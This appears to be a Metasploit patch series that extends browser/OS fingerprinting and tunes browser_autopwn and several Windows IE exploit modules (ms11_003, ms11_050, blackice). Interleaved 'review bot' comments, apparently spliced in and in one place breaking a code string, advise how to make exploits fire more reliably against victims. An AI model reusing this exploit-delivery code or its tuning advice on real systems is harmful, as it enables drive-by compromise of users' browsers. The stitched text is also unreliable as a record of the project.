From bb4e37b7aa2567eeec441783f9e64332eeaa8ff3 Mon Sep 17 00:00:00 2001 From: James Lee Date: Fri, 6 Apr 2012 18:09:19 -0600 Subject: [PATCH 01/10] Add a few fingerprints. Thanks browsershots.org! --- lib/rex/exploitation/javascriptosdetect.js | 20 +++++++++++++++++++- 1 file changed, 19 insertions(+), 1 deletion(-) diff --git a/lib/rex/exploitation/javascriptosdetect.js b/lib/rex/exploitation/javascriptosdetect.js index c91474c64c..f20b8d1c10 100644 --- a/lib/rex/exploitation/javascriptosdetect.js +++ b/lib/rex/exploitation/javascriptosdetect.js @@ -64,9 +64,13 @@ window.os_detect.getVersion = function(){ case "344": // opera-9.0-20060616.1-static-qt.i386-en-344 case "2091": // opera-9.52-2091.gcc3-shared-qt3.i386.rpm case "2444": // opera-9.60.gcc4-shared-qt3.i386.rpm + case "4102": // Opera 10.00 / Ubuntu 8.04 LTS (Hardy Heron) case "6386": // 10.61 os_name = oses_linux; break; + case "3445": // 10.61 + case "3516": // Opera 10.63 / Windows XP + case "7730": // Opera 8.54 / Windows XP case "8502": // "Opera 9 Eng Setup.exe" case "8679": // "Opera_9.10_Eng_Setup.exe" case "8771": // "Opera_9.20_Eng_Setup.exe" @@ -74,12 +78,20 @@ window.os_detect.getVersion = function(){ case "8801": // "Opera_9.22_Eng_Setup.exe" case "10108": // "Opera_952_10108_en.exe" case "10467": // "Opera_962_en_Setup.exe" - case "3445": // 10.61 + case "10476": // Opera 9.63 / Windows XP os_name = oses_windows; break; + case "2480": // Opera 9.64 / FreeBSD 7.0 + os_name = oses_freebsd; + break; case "6386": // 10.61 os_name = oses_mac_osx; break; + // A few are ambiguous, record them here + case "1250": + // Opera 11.61 / Windows XP + // Opera 11.61 / Debian 4.0 (Etch) + break; //default: // document.write(opera.buildNumber('inconspicuous')); // break; 
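Review bot: The new "ambiguous" bucket at the end of the Opera switch (`case "1250": ... break;`) should also take `"6386"`, which this hunk leaves as a label in both the `oses_linux` group and the `oses_mac_osx` group. A JavaScript switch executes the first label that matches, so the Mac OS X branch for `"6386"` is dead code and every Opera 10.61 Mac client is reported as Linux. I'd move it under the ambiguous comment as `case "6386": // Opera 10.61 / Linux or Mac OS X` and delete the two existing labels. The enclosing `getVersion` function begins and ends outside this hunk.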
@@ -644,6 +656,12 @@ window.os_detect.getVersion = function(){ os_flavor = "XP"; os_sp = "SP3"; break; + case "5722589": + // browsershots.org, MSIE 7.0 / Windows XP + ua_version = "7.0"; + os_flavor = "XP"; + // don't know what the service pack is =( + break; case "576000": // IE 7.0.6000.16386, Vista Ultimate SP0 English ua_version = "7.0"; From bac6bcd6f12df5ab46a387efeb6cde631b69ddfd Mon Sep 17 00:00:00 2001 From: James Lee Date: Fri, 6 Apr 2012 18:41:14 -0600 Subject: [PATCH 02/10] More fingerprints from browsershots --- lib/rex/exploitation/javascriptosdetect.js | 2 ++ 1 file changed, 2 insertions(+) diff --git a/lib/rex/exploitation/javascriptosdetect.js b/lib/rex/exploitation/javascriptosdetect.js index f20b8d1c10..f50e68eef8 100644 --- a/lib/rex/exploitation/javascriptosdetect.js +++ b/lib/rex/exploitation/javascriptosdetect.js @@ -68,6 +68,8 @@ window.os_detect.getVersion = function(){ case "6386": // 10.61 os_name = oses_linux; break; + case "1074": // Opera 11.50 / Windows XP + case "1100": // Opera 11.52 / Windows XP case "3445": // 10.61 case "3516": // Opera 10.63 / Windows XP case "7730": // Opera 8.54 / Windows XP From 9ae9509cfe5f459dcc71c4ffb52eef51aa79d8ef Mon Sep 17 00:00:00 2001 From: James Lee Date: Sun, 8 Apr 2012 11:12:32 -0600 Subject: [PATCH 03/10] More fingerprints from browsershots --- lib/rex/exploitation/javascriptosdetect.js | 31 +++++++++++++++++++--- 1 file changed, 27 insertions(+), 4 deletions(-) diff --git a/lib/rex/exploitation/javascriptosdetect.js b/lib/rex/exploitation/javascriptosdetect.js index f50e68eef8..181d7138d1 100644 --- a/lib/rex/exploitation/javascriptosdetect.js +++ b/lib/rex/exploitation/javascriptosdetect.js 
@@ -62,8 +62,10 @@ window.os_detect.getVersion = function(){ // though I have not verfied this claim. switch (opera.buildNumber('inconspicuous')) { case "344": // opera-9.0-20060616.1-static-qt.i386-en-344 + case "1347": // Opera 9.80 / Ubuntu 10.10 (Karmic Koala) case "2091": // opera-9.52-2091.gcc3-shared-qt3.i386.rpm case "2444": // opera-9.60.gcc4-shared-qt3.i386.rpm + case "2474": // Opera 9.63 / Debian Testing (Lenny) case "4102": // Opera 10.00 / Ubuntu 8.04 LTS (Hardy Heron) case "6386": // 10.61 os_name = oses_linux; @@ -91,6 +93,7 @@ window.os_detect.getVersion = function(){ break; // A few are ambiguous, record them here case "1250": + // Opera 9.80 / Windows XP // Opera 11.61 / Windows XP // Opera 11.61 / Debian 4.0 (Etch) break; @@ -249,11 +252,13 @@ window.os_detect.getVersion = function(){ } break; case "2008102918": ua_version = "2.0.0.18"; os_name = oses_windows; break; case "2008102920": ua_version = "3.0.4"; break; + case "2008112309": ua_version = "3.0.4"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Iceweasel 3.0.4 / Debian Testing (Lenny) case "2008111317": ua_version = "3.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2008111318": ua_version = "3.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "2008120119": ua_version = "2.0.0.19"; os_name = oses_windows; break; case "2008120121": ua_version = "3.0.5"; os_name = oses_linux; break; case "2008120122": ua_version = "3.0.5"; os_name = oses_windows; break; + case "2008121623": ua_version = "2.0.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 2.0.0.19 / Ubuntu 8.04 LTS (Hardy Heron) case "2008121709": ua_version = "2.0.0.20"; os_name = oses_windows; break; case "2009011912": ua_version = "3.0.6"; os_name = oses_linux; break; case "2009011913": ua_version = "3.0.6"; os_name = oses_windows; break; 
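Review bot: The provenance comment on the new `case "1347": // Opera 9.80 / Ubuntu 10.10 (Karmic Koala)` is self-contradictory: Karmic Koala is Ubuntu 9.10, and the Firefox entries added later in this same commit use `Ubuntu 9.10 (Karmic Koala)`. Since these comments are the only record of where a fingerprint came from, the line should be checked against the browsershots entry and corrected to whichever half (version or codename) is wrong. The same hunk's `case "2474": // Opera 9.63 / Debian Testing (Lenny)` would benefit from the same double-check, because "Testing" is a moving target and the release codename is what the reader will search for.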
@@ -393,20 +398,20 @@ window.os_detect.getVersion = function(){ case "20091216142458": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "20091216142519": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "2009121708": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86; break; - case "2009122115": ua_version = "3.0.17"; break; // Can be either Mac or Linux - case "2009122116": ua_version = "3.0.17"; os_name = oses_windows; break; case "20091221151141": ua_version = "3.5.7"; os_name = oses_mac_osx; break; case "20091221152502": ua_version = "3.5.7"; os_name = oses_linux; break; + case "2009122115": ua_version = "3.0.17"; break; // Can be either Mac or Linux case "20091221164558": ua_version = "3.5.7"; os_name = oses_windows; break; + case "2009122116": ua_version = "3.0.17"; os_name = oses_windows; break; case "2009122200": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "SUSE"; break; case "20091223231431": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "PCLunixOS"; arch = arch_x86; break; case "20100105194006": ua_version = "3.6.0.rc1"; os_name = oses_mac_osx; break; case "20100105194116": ua_version = "3.6.0.rc1"; os_name = oses_linux; break; case "20100105212446": ua_version = "3.6.0.rc1"; os_name = oses_windows; break; case "2010010604": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; break; - case "2010010605": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100106054534": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86 case "20100106054634": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64 + case "2010010605": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case 
"20100106211825": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; case "20100106212742": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break; case "20100106215614": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; @@ -465,8 +470,8 @@ window.os_detect.getVersion = function(){ case "2010040116": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2010040118": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2010040119": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; - case "2010040121": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100401213457": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; + case "2010040121": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "2010040123": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "2010040200": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20100402010516": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Mint"; arch = arch_x86_64; break; 
@@ -547,6 +552,24 @@ window.os_detect.getVersion = function(){ case "20100716093011": ua_version = "3.6.7.b2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "20101203075014": ua_version = "3.6.13"; os_name = oses_windows; break; case "20101206122825": ua_version = "3.6.13"; os_name = oses_linux; os_flavor = "Ubuntu"; break; + case "20110318052756": ua_version = "4.0"; os_name = oses_windows; break; // browsershots: Firefox 4.0 / Windows XP + case "20110420144310": ua_version = "3.5.19"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 3.5.19 / Debian 4.0 (Etch) + case "20110615151330": ua_version = "5.0"; os_name = oses_windows; break; // browsershots: Firefox 5.0 / Windows XP + case "20110811165603": ua_version = "6.0"; os_name = oses_windows; break; // browsershots: Firefox 6.0 / Windows XP + case "20110830092941": ua_version = "6.0.1"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 6.0.1 / Debian 4.0 (Etch) + case "20110922153450": ua_version = "7.0"; os_name = oses_windows; break; // browsershots: Firefox 7.0 / Windows XP + case "20110928134238": ua_version = "7.0.1"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 7.0.1 / Debian 4.0 (Etch) + case "20111104165243": ua_version = "8.0"; os_name = oses_windows; break; // browsershots: Firefox 8.0 / Windows XP + case "20111115183813": ua_version = "8.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 8.0 / Ubuntu 9.10 (Karmic Koala) + case "20111216140209": ua_version = "9.0"; os_name = oses_windows; break; // browsershots: Firefox 9.0 / Windows XP + case "20120129021758": ua_version = "10.0"; os_name = oses_windows; break; // browsershots: Firefox 10.0 / Windows 2000 + case "20120201083324": ua_version = "3.5.16"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Iceweasel 3.5.16 / Debian 4.0 (Etch) + case "20120216013254": ua_version = "3.6.27"; os_name = 
oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 3.6.27 / Debian 4.0 (Etch) + case "20120216100510": ua_version = "10.0.2"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 10.0.2 / Ubuntu 9.10 (Karmic Koala) + case "20120310010316": ua_version = "11.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 11.0 / Ubuntu 9.10 (Karmic Koala) + case "20120310194926": ua_version = "11.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; + case "20120312181643": ua_version = "11.0"; os_name = oses_windows; break; // browsershots: Firefox 11.0 / Windows XP + case "20120314195616": ua_version = "12.0"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 12.0 / Debian 4.0 (Etch) default: version = this.searchVersion("Firefox", navigator.userAgent); // Verify whether the ua string is lying by checking if it contains From f520af036f27d4c8b21626737543af41178819bd Mon Sep 17 00:00:00 2001 From: James Lee Date: Sun, 8 Apr 2012 17:06:23 -0600 Subject: [PATCH 04/10] Move next_exploit() onto window object so it's accessible everywhere I swear I committed this before, not sure what happened. --- modules/auxiliary/server/browser_autopwn.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/server/browser_autopwn.rb b/modules/auxiliary/server/browser_autopwn.rb index b8a241323e..e2ff9ebb9f 100644 --- a/modules/auxiliary/server/browser_autopwn.rb +++ b/modules/auxiliary/server/browser_autopwn.rb @@ -706,7 +706,7 @@ class Metasploit3 < Msf::Auxiliary # Generic stuff that is needed regardless of what browser was detected. js << <<-ENDJS var written_iframes = new Array(); - function write_iframe(myframe) { + window.write_iframe = function (myframe) { var iframe_idx; var mybody; for (iframe_idx in written_iframes) { if (written_iframes[iframe_idx] == myframe) { 
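Review bot: `case "20120310194926": ua_version = "11.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break;` is the only new entry without a `// browsershots: ...` provenance comment, which makes it impossible to re-verify later; either add the source or mark it `// unverified`. More importantly, Mozilla's official builds, to my knowledge, share a single buildID across Windows, Mac and Linux from 4.0 onward, and none of the 4.0 to 11.0 entries here has a platform-specific counterpart, so binding e.g. `"20110318052756"` to `oses_windows` from one browsershots sample risks misreporting Mac and Linux users of the same build. The file already has a pattern for that situation, an entry that sets only `ua_version` with a `// Can be either Mac or Linux` style comment, and I'd use it for the official-build entries, keeping `os_name` only on the distro-built Ubuntu/Debian/Iceweasel ones whose buildIDs differ from Mozilla's. The `default:` branch that follows runs past the end of this hunk.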
@@ -718,7 +718,7 @@ class Metasploit3 < Msf::Auxiliary str += ''; document.body.innerHTML += (str); } - function next_exploit(exploit_idx) { + window.next_exploit = function (exploit_idx) { #{js_debug("'next_exploit(' + exploit_idx +')'")} if (!global_exploit_list[exploit_idx]) { #{js_debug("'End'")} @@ -745,15 +745,15 @@ class Metasploit3 < Msf::Auxiliary if (eval(test)) { #{js_debug("'test says it is vuln, writing iframe for ' + global_exploit_list[exploit_idx].resource + '
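Review bot: While `write_iframe` is being moved onto `window`, its tail `document.body.innerHTML += (str);` (context at the top of this hunk) deserves a fix too: assigning to innerHTML re-parses the whole body and replaces every existing child node, so each newly written exploit iframe re-creates, and therefore reloads, all the earlier ones, which the `written_iframes` de-duplication list cannot prevent. Building the element with `document.createElement('iframe')`, setting its attributes, and calling `document.body.appendChild(...)` adds only the new frame and leaves running exploits alone. `write_iframe` begins in the previous hunk, so the lines that build `str` are not visible here and the attribute list would need to be carried over from them.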
'")} - write_iframe(global_exploit_list[exploit_idx].resource); - setTimeout("next_exploit(" + (exploit_idx+1).toString() + ")", 1000); + window.write_iframe(global_exploit_list[exploit_idx].resource); + setTimeout("window.next_exploit(" + (exploit_idx+1).toString() + ")", 1000); } else { #{js_debug("'this client does not appear to be vulnerable to ' + global_exploit_list[exploit_idx].resource + '
'")} - next_exploit(exploit_idx+1); + window.next_exploit(exploit_idx+1); } } catch(e) { #{js_debug("'test threw an exception: ' + e.message + '
'")} - next_exploit(exploit_idx+1); + window.next_exploit(exploit_idx+1); }; } ENDJS @@ -832,8 +832,8 @@ class Metasploit3 < Msf::Auxiliary js << %Q|noscript_div.innerHTML = unescape(noscript_exploits);\n| js << %Q|document.body.appendChild(noscript_div);\n| - js << "#{js_debug("'starting exploits
'")}\n" - js << "next_exploit(0);\n" + js << "#{js_debug("'starting exploits (' + global_exploit_list.length + ' total)
'")}\n" + js << "window.next_exploit(0);\n" js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate From da1cb2b81d932c804f05955ce245300416f9ffff Mon Sep 17 00:00:00 2001 From: James Lee Date: Sun, 8 Apr 2012 22:07:09 -0600 Subject: [PATCH 05/10] ActiveX controls require IE --- modules/exploits/windows/browser/wmi_admintools.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb index c918f36dc1..47bfbd6917 100644 --- a/modules/exploits/windows/browser/wmi_admintools.rb +++ b/modules/exploits/windows/browser/wmi_admintools.rb @@ -19,6 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote autopwn_info({ :os_name => OperatingSystems::WINDOWS, + :ua_name => HttpClients::IE, :rank => NormalRanking, :vuln_test => nil, }) From 409ba3139be41f6d4b3fd3ff9312b5baf559a0c2 Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 9 Apr 2012 00:50:04 -0600 Subject: [PATCH 06/10] Add bap checks for blackice exploit --- .../exploits/windows/browser/blackice_downloadimagefileurl.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb index 605b1296eb..4604118c40 100644 --- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb +++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb @@ -21,9 +21,11 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :os_name => OperatingSystems::WINDOWS, + :ua_name => HttpClients::IE, :javascript => true, :rank => NormalRanking, - :vuln_test => nil, + :classid => "{79956462-F148-497F-B247-DF35A095F80B}", + :vuln_test => "DownloadImageFileURL", }) def initialize(info = {}) From a6b106e8674b854581539d5bd28a3a4560ee11fa Mon Sep 17 00:00:00 2001 
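Review bot: `:vuln_test => "DownloadImageFileURL"` in the blackice hunk is a bare identifier, whereas the other autopwn tests in this series (`is_vuln = true` in browser_autopwn, the `.NET CLR` check in ms11_003) are JavaScript statements that assign `is_vuln`, and browser_autopwn runs the test through `eval(test)` inside a try/catch that skips the exploit on any exception. Unless the `:classid` handling in browser_autopwn (outside these hunks) rewrites a method name into an ActiveX probe, evaluating `DownloadImageFileURL` throws a ReferenceError and the exploit is silently never sent. If that handling does exist, a comment beside it such as `# with :classid set, :vuln_test names the control method autopwn probes for` would spare the next reader the same question.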
From: James Lee Date: Mon, 9 Apr 2012 01:05:37 -0600 Subject: [PATCH 07/10] Remove autopwn support for enjoysapgui_comp_download No automatic targeting, the payload doesn't execute immediately, and requires the browser be running as Admin. Bascially just not a great candidate for being run automatically. --- .../exploits/windows/browser/enjoysapgui_comp_download.rb | 8 -------- 1 file changed, 8 deletions(-) diff --git a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb index ab223a4203..50daa25ce3 100644 --- a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb +++ b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb @@ -17,14 +17,6 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE - include Msf::Exploit::Remote::BrowserAutopwn - autopwn_info({ - :os_name => OperatingSystems::WINDOWS, - :javascript => true, - :rank => NormalRanking, - :vuln_test => nil, - }) - def initialize(info = {}) super(update_info(info, 'Name' => 'EnjoySAP SAP GUI ActiveX Control Arbitrary File Download', From 3ca440089e9addc13f22b0cfe24b14433e8e672e Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 9 Apr 2012 01:23:44 -0600 Subject: [PATCH 08/10] Add checks for .NET requisites Also standardizes print_status format to look nicer with lots of cilents --- .../windows/browser/ms11_003_ie_css_import.rb | 35 +++++++++++-------- .../browser/ms11_050_mshtml_cobjectelement.rb | 13 ++++--- 2 files changed, 29 insertions(+), 19 deletions(-) diff --git a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb index 8d1e5de1e4..8d7c91af6a 100644 --- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb +++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb 
@@ -22,7 +22,9 @@ class Metasploit3 < Msf::Exploit::Remote :ua_maxver => "8.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, - :vuln_test => nil, # no way to test without just trying it + # Not strictly a vuln check, but an exploitability check since a + # specific version of .NET is required to make the ROP work. + :vuln_test => "if (/.NET CLR 2\\.0\\.50727/.test(navigator.userAgent)) { is_vuln = true }else{ is_vuln = false }", }) def initialize(info = {}) @@ -152,27 +154,30 @@ class Metasploit3 < Msf::Exploit::Remote agent = request.headers['User-Agent'] #print_status("Checking user agent: #{agent}") - if agent !~ /\.NET CLR 2\.0\.50727/ - print_error("#{cli.peerhost}:#{cli.peerport} Target machine does not have the .NET CLR 2.0.50727") - return nil - end - if agent =~ /MSIE 6\.0/ mytarget = targets[3] elsif agent =~ /MSIE 7\.0/ - mytarget = targets[2] + mytarget = ua_has_clr(cli,agent) ? targets[2] : nil elsif agent =~ /MSIE 8\.0/ - mytarget = targets[1] + mytarget = ua_has_clr(cli,agent) ? targets[1] : nil else - print_error("#{cli.peerhost}:#{cli.peerport} Unknown User-Agent #{agent}") + print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent}") end mytarget end + def ua_has_clr(cli, agent) + if agent =~ /\.NET CLR 2\.0\.50727/ + return true + end + print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Target machine does not have the .NET CLR 2.0.50727") + false + end + def on_request_uri(cli, request) - print_status("#{cli.peerhost}:#{cli.peerport} Received request for %s" % request.uri.inspect) + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Received request for %s" % request.uri.inspect) mytarget = target if target.name == 'Automatic' 
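Review bot: The new autopwn `:vuln_test` demands `.NET CLR 2.0.50727` for every IE version, but the target selection in the second hunk calls `ua_has_clr` only for MSIE 7.0 and 8.0 and serves `targets[3]` to MSIE 6.0 unconditionally, so under autopwn an IE 6 client without that CLR is skipped even though the module itself would exploit it. If IE 6 really needs no .NET, the test should say so: `if (/MSIE 6\\.0/.test(navigator.userAgent) || /\\.NET CLR 2\\.0\\.50727/.test(navigator.userAgent)) { is_vuln = true } else { is_vuln = false }`. The regex in the test also leaves the leading `.` of `.NET` unescaped, unlike the Ruby check in `ua_has_clr`. `ua_has_clr` is added as a public method; moving it below a `private` marker keeps it out of the module's interface.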
@@ -183,7 +188,7 @@ class Metasploit3 < Msf::Exploit::Remote end end - #print_status("#{cli.peerhost}:#{cli.peerport} Automatically selected target: #{mytarget.name}") + #print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Automatically selected target: #{mytarget.name}") buf_addr = mytarget.ret css_name = [buf_addr].pack('V') * (16 / 4) @@ -193,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote uni_placeholder = Rex::Text.to_unicode(placeholder) if request.uri == get_resource() or request.uri =~ /\/$/ - print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} redirect") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending redirect") redir = get_resource() redir << '/' if redir[-1,1] != '/' @@ -205,7 +210,7 @@ class Metasploit3 < Msf::Exploit::Remote # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) - print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} HTML") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending HTML") # Generate the ROP payload rvas = rvas_mscorie_v2() @@ -309,7 +314,7 @@ EOS send_response(cli, html, { 'Content-Type' => 'text/html' }) elsif request.uri =~ /\.dll$/ - print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} .NET DLL") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending .NET DLL") # Generate a .NET v2.0 DLL, note that it doesn't really matter what this contains since we don't actually # use it's contents ... @@ -340,7 +345,7 @@ EOS css = "\xff\xfe" + Rex::Text.to_unicode(css) css.gsub!(uni_placeholder, css_name) - print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} CSS") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending CSS") send_response(cli, css, { 'Content-Type' => 'text/css' }) diff --git a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb index c445e2cc83..5e24660346 100644 
--- a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb +++ b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb @@ -22,7 +22,12 @@ class Metasploit3 < Msf::Exploit::Remote :ua_maxver => "8.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, - :vuln_test => nil, + # If it's IE 8, then we need .net to bypass ASLR + :vuln_test => %Q| + if (window.os_detect && ua_ver_eq(window.os_detect.ua_version, "8")) { + if (/.NET CLR 2\\.0\\.50727/.test(navigator.userAgent)){ is_vuln = true }else{ is_vuln = false } + } + |, }) def initialize(info={}) @@ -153,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote mytarget = auto_target(cli, request) if mytarget.nil? agent = request.headers['User-Agent'] - print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}") + print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent}") send_not_found(cli) return end @@ -175,7 +180,7 @@ class Metasploit3 < Msf::Exploit::Remote DATA - print_status("Triggering #{self.name} vulnerability at #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Triggering vulnerability (target: #{mytarget.name})...") send_response(cli, data, { 'Content-Type' => 'text/html' }) return end @@ -297,7 +302,7 @@ class Metasploit3 < Msf::Exploit::Remote HTML - print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport} (#{mytarget.name})...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit (#{mytarget.name})...") send_response(cli, html, {'Content-Type'=>'text/html'}) end end From b38933328fbf4cfeb61543ff2e275d446ecfd211 Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 9 Apr 2012 01:53:57 -0600 Subject: [PATCH 09/10] Send exploits that are not assocated with any browser to all of them --- modules/auxiliary/server/browser_autopwn.rb | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) 
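Review bot: The new `:vuln_test` for ms11_050 assigns `is_vuln` only inside `if (window.os_detect && ua_ver_eq(window.os_detect.ua_version, "8"))` and has no else branch, so for IE 6 and 7, which the new comment says need no .NET, the snippet produces no value. browser_autopwn decides with `if (eval(test))` (patch 04 in this series), so those clients are treated as not vulnerable and the exploit never fires. A single expression avoids depending on completion-value rules: `is_vuln = (window.os_detect && ua_ver_eq(window.os_detect.ua_version, "8")) ? /\\.NET CLR 2\\.0\\.50727/.test(navigator.userAgent) : true`; note that `||` cannot appear inside the `%Q|...|` literal, which is another reason to prefer the ternary. Whether `ua_ver_eq(..., "8")` matches the `"8.0"` that os_detect reports for IE 8 depends on that helper, which is outside this diff.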
diff --git a/modules/auxiliary/server/browser_autopwn.rb b/modules/auxiliary/server/browser_autopwn.rb index e2ff9ebb9f..3b105c31d1 100644 --- a/modules/auxiliary/server/browser_autopwn.rb +++ b/modules/auxiliary/server/browser_autopwn.rb @@ -766,7 +766,12 @@ class Metasploit3 < Msf::Auxiliary @js_tests.each { |browser, sploits| next unless client_matches_browser(client_info, browser) - if (client_info.nil? || [nil, browser].include?(client_info[:ua_name])) + # Send all the generics regardless of what the client is. If the + # client is nil, then we don't know what it really is, so just err + # on the side of shells and send everything. Otherwise, send only + # if the client is using the browser associated with this set of + # exploits. + if (browser == "generic" || client_info.nil? || [nil, browser].include?(client_info[:ua_name])) sploits.each do |s| if s[:vuln_test].nil? or s[:vuln_test].empty? test = "is_vuln = true" @@ -783,7 +788,10 @@ class Metasploit3 < Msf::Auxiliary # victim. Note that host_info comes from javascript OS # detection, NOT the database. if host_info[:os_name] != "undefined" - next unless s[:os_name].include?(host_info[:os_name]) + unless s[:os_name].include?(host_info[:os_name]) + vprint_status("Rejecting #{s[:name]} for non-matching OS") + next + end end end js << "global_exploit_list[global_exploit_list.length] = {\n" @@ -881,6 +889,7 @@ class Metasploit3 < Msf::Auxiliary def client_matches_browser(client_info, browser) if client_info and browser and client_info[:ua_name] if browser != "generic" and client_info[:ua_name] != browser + vprint_status("Rejecting exploits for #{browser}") return false end end From 037fbf655e342efc60cdc0fa8dba0b32826c095f Mon Sep 17 00:00:00 2001 
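Review bot: The new `vprint_status("Rejecting #{s[:name]} for non-matching OS")` path runs whenever `host_info[:os_name]` is anything other than the literal string `"undefined"`, including Ruby `nil`, and `s[:os_name].include?(nil)` is false, so if `host_info` can arrive without an os_name (how it is populated is outside this diff) every exploit is rejected with that message, contradicting the "err on the side of shells" comment added a few lines up. Guarding with `if host_info[:os_name] && host_info[:os_name] != "undefined"` makes the unknown-OS case behave like the unknown-browser case. The `"generic"` acceptance now lives in two places, the new `browser == "generic" ||` clause here and the existing check in `client_matches_browser`; a one-line comment on `client_matches_browser` saying that "generic" always passes would tie them together for the next editor. The enclosing method begins before the first hunk.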
